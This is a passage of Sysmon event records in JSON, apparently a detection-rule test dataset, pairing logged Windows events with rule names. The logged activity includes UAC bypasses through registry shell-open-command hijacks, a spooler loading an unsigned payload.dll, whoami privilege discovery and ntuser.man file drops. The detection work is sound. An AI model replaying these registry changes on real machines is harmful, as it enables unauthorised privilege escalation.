10:45:07.672"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":7,"EventRecordID":343368,"Execution_attributes":{"ProcessID":8124,"ThreadID":7540},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-11-26T10:45:07.686999Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious Binary Load"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=4B0D3EF916C4D5E4249DC62E0A1A2307C495E3FB,MD5=C957DB23045704214C1A53260598FC85,SHA256=7C1B045BB80761F9E9EDD9B8B7A53D9C374CA0C78926F7AEE1EACCC32EC3B198,IMPHASH=8DEF796746DD54062D5B3186EEF39356","Image":"C:\\Windows\\System32\\spoolsv.exe","ImageLoaded":"C:\\Windows\\System32\\spool\\drivers\\x64\\4\\payload.dll","ProcessGuid":"6A3C3EF2-8739-5FBF-0000-001075514700","ProcessId":8716,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-11-26 10:45:23.976"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":7,"EventRecordID":343371,"Execution_attributes":{"ProcessID":8124,"ThreadID":7540},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-11-26T10:45:24.216387Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\Windows\\System32\\cmd.exe","EventType":"SetValue","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-7D80-5CD5-0000-00100AD01300","ProcessId":2796,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\mscfile\\shell\\open\\command\\(Default)","UtcTime":"2019-05-10 13:32:48.397"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":15676,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:32:48.412971Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery","Run Whoami Showing Privileges"],"event":{"Event":{"EventData":{"CommandLine":"whoami /priv","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-79DF-5CD5-0000-0020F8410100","LogonId":"0x141f8","ParentCommandLine":"\"c:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-7D86-5CD5-0000-0010CC2E1400","ParentProcessId":2076,"ProcessGuid":"365ABB72-7DA9-5CD5-0000-00100ED31400","ProcessId":2524,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-10 13:33:29.409"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":15678,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:33:29.424885Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\Windows\\SysWOW64\\notepad.exe","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-9DB0-5D46-0000-00108243AF03","ProcessId":3580,"RuleName":"PrivEsc - UAC bypass UACME-45","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\exefile\\shell\\open\\command\\(Default)","UtcTime":"2019-08-04 08:56:16.635"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5664,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T08:56:16.650581Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.751","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man","UtcTime":"2020-08-25 10:08:05.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358988,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.763694Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man.LOG1","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358989,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.770148Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man.LOG2","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358990,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.772810Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358991,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.776409Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358992,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.780448Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.782","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms","UtcTime":"2020-08-25 10:08:05.782"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358993,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.787947Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359028,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.398014Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man.LOG1","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359030,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401175Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man.LOG2","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359031,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401210Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359032,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401236Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359033,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401303Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359036,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.418961Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.579","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf","UtcTime":"2020-08-25 10:08:37.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359040,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.594123Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.595","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms","UtcTime":"2020-08-25 10:08:37.595"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359041,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.610172Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359044,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.677776Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359046,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.678592Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359047,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.678627Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\TransactionLog.exe.log","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359048,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.678671Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-A104-5D46-0000-0010C79CBC03","ProcessId":7312,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Folder\\shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 09:10:28.869"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5696,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:10:28.893194Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-A104-5D46-0000-001092A6BC03","ProcessId":2576,"RuleName":"PrivEsc - UAC bypass 